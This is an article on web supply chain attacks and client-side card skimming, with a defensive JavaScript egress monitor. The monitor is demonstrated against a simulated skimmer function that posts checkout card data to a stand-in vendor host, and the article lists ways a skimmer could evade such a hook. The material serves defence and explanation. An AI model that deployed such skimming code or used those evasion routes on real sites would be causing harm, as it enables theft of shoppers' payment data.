The SolarWinds attack continues to send ripples across the world of cybersecurity. For the uninitiated: the attackers compromised SolarWinds’ build process and shipped a backdoor inside signed updates of its Orion platform, so the compromise spread like a slow poison, through a trusted update channel, to thousands of customers. Its fallout proved to be massive, starting with national (US) security concerns that Russia might have been involved and ending with President Biden issuing Executive Order 14028 on improving the nation’s cybersecurity in May 2021, followed closely by similar efforts by the UK government.
Whether or not it was a state-sponsored venture, this attack proved to be a huge wake-up call and shone a spotlight on software supply chain attacks. This has become particularly significant given that threat actors have quickly adapted this same approach to other supply chains.
Indeed, it seems that they might have found the holy grail by targeting companies with a strong web presence. Hence the emergence of one of the key growing attack vectors in 2021: the “web supply chain attack”.
The what?
Let’s start from the beginning, and that means looking at the dominance of JavaScript across the web. JavaScript is the “language” of the web. It is estimated that 97% of the world’s websites use JavaScript—including the websites of all Fortune 500 companies.
Twenty years ago, the web mostly consisted of static websites with little to no functionality – but that quickly changed. Ever since the JavaScript open-source community began to assert itself back in 2009, we have witnessed an explosion of open-source projects, with the community releasing millions of reusable code pieces (modules or packages) that can easily be shared between projects. The subsequent growth of this ecosystem increased the speed of development for all apps – web, mobile and desktop.
In such a hot space, companies sought to cut product development time by relying on widely used, openly maintained third-party modules instead of developing every piece of code in-house (most of these packages receive no formal review; their trustworthiness rests on popularity and on whoever happens to maintain them). And so, the use of third-party code became standard in web development.
Meanwhile, the web was becoming more valuable and complex. Static websites turned into dynamic pages, culminating in today’s full-fledged digital services like online banking, e-commerce, and streaming. This quick shift was also driven by a growing supply chain of digital services for marketing, UX, and business tools. Instead of implementing their own chatbot, analytics or CRM tools, companies purchased these services from third parties and integrated them directly into their websites.
It’s no wonder, then, that over two-thirds of all the code running on the average website today comes from third parties. And here is where security concerns arise. A browser does not distinguish between first- and third-party script: every script tag on a page, whether it points at the company’s own servers or at a vendor’s CDN, executes in the page’s origin with exactly the same access to the DOM, form fields, cookies and network as the code that was developed in-house. So, if a chatbot tool suddenly starts capturing the credit card details that shoppers type into an e-commerce site’s checkout form and sending them to a server of its choosing, nothing in the browser stops it. This is the essence of a web supply chain attack: breach a third-party service provider, inject malicious code into the service it delivers and, as a result, spread that code to every website that embeds it.
Not only do companies have no control over this, but they also have no real visibility of it: the malicious code runs in the visitor’s browser, so nothing shows up in the company’s own server logs or in scans of its own codebase. That’s why client-side skimming attacks of the Magecart kind often remain active for months on end.
Best defence?
The UK’s National Cyber Security Centre (NCSC) offers some useful advice on assessing supply chain security and supply chain management practice, in the form of 12 principles designed to help organizations establish effective control and oversight of their supply chains. It’s a useful starting point, but dealing with web supply chain attacks requires an in-depth look at third-party code usage.
Third-party code is here to stay. It is embedded in the core fabric of web development and remains one of the most valuable assets for competitive product development. However, it is possible to reduce the risks inherent in externally sourced code if companies learn how to integrate it safely. This requires security and development teams to cut code dependencies wherever possible and to use the browser’s own controls where they apply: Subresource Integrity pins a script tag to the hash of a known file, and a Content Security Policy with a tight connect-src limits where any script on the page may send data. Both have limits: an integrity hash works only for static files and is of no use for a vendor script that changes with every load, and a CSP covers only the request channels it names. On top of that, teams need technology that gives them visibility and control over the behavior of all code running on the client side of their websites (i.e., everything that takes place in the browser or on the end-user device).
This is key if companies are to regain control over their web supply chain. And to maximize security, companies need to do it continuously at runtime, monitoring every user session for signs of malicious behavior, such as a script reading payment fields it has no reason to touch or sending data to an origin the site never sanctioned.
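The mechanism described in the two passages above (third-party script running with first-party privileges, and a runtime control that watches what every script sends), as an added example that is not part of the original article or of any vendor’s product: a small egress monitor in JavaScript. It wraps the page’s fetch so that every outbound request, from first- or third-party code alike, is checked against an allowlist of origins and inspected for card numbers, then runs a simulated skimmer through it. All origins, the `page` object standing in for `window`, the policy shape and the checkout data are constructed for the example; nothing here touches the network.

```javascript
// Runtime egress monitor for a web page (all names hypothetical). Every script
// on the page shares one fetch, so wrapping it gives a single choke point.

// Luhn check, so only digit runs that look like a real card number count.
function isLuhnValid(digits) {
  let sum = 0;
  let double = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (double) {
      d *= 2;
      if (d > 9) d -= 9;
    }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// Scan a request body (string or JSON-serialisable value) for 13-19 digit
// runs, allowing spaces or dashes between digits, and keep Luhn-valid ones.
function containsCardNumber(body) {
  if (body === undefined || body === null) return false;
  const text = typeof body === "string" ? body : JSON.stringify(body);
  const candidates = text.match(/\d(?:[ -]?\d){12,18}/g) || [];
  return candidates.some((c) => isLuhnValid(c.replace(/[ -]/g, "")));
}

// Policy decision for one outbound request: the destination origin must be
// allowlisted, and a body carrying a card number may only go to the payment origin.
function classifyRequest(url, body, policy) {
  const origin = new URL(url).origin;
  const carriesCard = containsCardNumber(body);
  let allowed = policy.allowedOrigins.has(origin);
  let reason = allowed ? "origin allowlisted" : "origin not allowlisted";
  if (allowed && carriesCard && origin !== policy.paymentOrigin) {
    allowed = false;
    reason = "card data to non-payment origin";
  }
  return { origin, carriesCard, allowed, reason };
}

// Replace page.fetch with a checked version; returns an uninstall function.
// `page` stands in for `window`; in a browser you would pass window itself.
function installEgressMonitor(page, policy, log) {
  const originalFetch = page.fetch;
  page.fetch = function monitoredFetch(url, init = {}) {
    const verdict = classifyRequest(url, init.body, policy);
    log.push({ url, ...verdict });
    if (!verdict.allowed) {
      return Promise.reject(new Error(`blocked: ${verdict.reason} (${verdict.origin})`));
    }
    return originalFetch.call(page, url, init);
  };
  return () => { page.fetch = originalFetch; };
}

// Constructed checkout data (4111... is a standard test PAN) and a simulated
// skimmer: a compromised chatbot bundle that reads the form and posts it to the
// vendor's own CDN, which the site legitimately allows the chatbot to talk to.
const CHECKOUT = {
  cardNumber: "4111 1111 1111 1111",
  expiry: "12/29",
  cvv: "123",
  orderId: "1234567890123", // 13 digits but not Luhn-valid: must not trigger
};

function skimmer(page) {
  return page.fetch("https://cdn.chatbot-vendor.example/collect", {
    method: "POST",
    body: JSON.stringify({ pan: CHECKOUT.cardNumber, cvv: CHECKOUT.cvv }),
  });
}

// Run three requests through the monitor and report what happened to each.
async function runScenario() {
  const page = { fetch: async () => ({ ok: true }) }; // no real network I/O
  const policy = {
    allowedOrigins: new Set(["https://shop.example", "https://pay.example",
      "https://cdn.chatbot-vendor.example"]),
    paymentOrigin: "https://pay.example",
  };
  const log = [];
  installEgressMonitor(page, policy, log);
  const outcome = (p) => p.then(() => "sent", (e) => e.message);
  const payment = await outcome(page.fetch("https://pay.example/charge", {
    method: "POST", body: JSON.stringify(CHECKOUT),
  }));
  const skim = await outcome(skimmer(page));
  const tracker = await outcome(page.fetch("https://tracker.example/ping", {
    method: "POST", body: "session=abc",
  }));
  return { payment, skim, tracker, log };
}
```

In a real page the monitor has to be installed before any third-party script loads, and it has to cover XMLHttpRequest, navigator.sendBeacon, WebSocket and image- or form-based exfiltration as well; a skimmer that sets an Image src or submits a hidden form walks straight past a fetch-only hook, and one that pulls a fresh fetch from a newly created iframe bypasses an in-page wrapper entirely. Treat a hook like this as the visibility layer (ship the log to the server and alert on blocked entries) sitting on top of a CSP connect-src, not as a replacement for it.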
This underpins the thinking behind DevSecOps, a real paradigm shift in the software industry that seeks to integrate security robustly into modern app development and deployment. As part of a global push toward more secure supply chains, DevSecOps ingrains security controls throughout the entire software development lifecycle, and those practices can certainly help businesses regain the visibility and control over their website supply chains that we have already touched upon.
The SolarWinds supply chain attack certainly ruffled a lot of important feathers. On the flip side, it has brought global awareness and the first signs of action against what may become one of the key cyber threats of the decade. Today, we’re at a key moment in time where preventing these attacks is within reach, while the cost of failing to do so is too high to ignore.